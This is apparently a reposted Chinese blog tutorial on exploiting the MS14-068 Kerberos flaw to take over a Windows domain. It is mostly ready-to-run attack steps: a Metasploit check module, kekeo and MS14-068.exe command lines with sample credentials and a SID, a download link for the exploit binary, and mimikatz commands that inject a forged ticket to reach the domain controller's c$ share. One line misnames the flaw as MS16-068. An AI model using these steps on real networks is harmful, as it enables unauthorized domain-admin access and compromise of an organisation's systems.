• [域渗透]MS14-068利用


     一、利用

    需要拥有一个域账号的账号密码明文

    net group "domain controllers" /domain 获取主域控地址

    使用msf对其漏洞进行检测,如果漏洞利用成功会生成一个bin文件

    poc:use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

    利用工具:https://github.com/gentilkiwi/kekeo/releases

    上传exp至临时目录

    klist  列出票据
    klist purge  清除票据

     kekeo.exe "exploit::ms14068 /domain:yiwang.com /user:admin123 /password:admin@AAA... /ptt" "exit"

    漏洞利用成功后成功访问域控c$目录

     

    方法二、 

    防止以msf爆出神奇操作,以msf检测漏洞为标准的情况所以...

    MS14-068:https://raw.githubusercontent.com/abatchy17/WindowsExploits/master/MS14-068/MS14-068.exe

    漏洞利用:

    Ms14-068.exe -u user1@humensec.com -p user@123 -s S-1-5-21-3858644736-3974512303-642681968-1134  -d 192.168.3.12

    漏洞利用成功后桌面会生成 .ccache文件,证明存在MS16-068

    mimikatz# kerberos::purge#清除原有票据

    mimikatz# kerberos::list #列出当前票据,确保清除干净

    mimikatz# kerberos::ptc TGT_XXX.ccache #将伪造的TGT导入内存

    dir \域控\c$

    多dir几次有可能会拒绝访问

    参考链接:

    https://www.cnblogs.com/yuzly/p/10859520.html

  • 相关阅读:
    JMeter网站测试分析
    JMeter元件的作用域和执行顺序
    JMeter脚本录制
    认识Jmeter工具
    Fiddler 只取所需
    Fiddler设置代理(PC和Android)
    Fiddler获取https会话
    Fiddler 你需要了解的
    关于excel的导入导出
    第十章、random模块
  • 原文地址:https://www.cnblogs.com/websecyw/p/11835830.html
Copyright © 2020-2023  润新知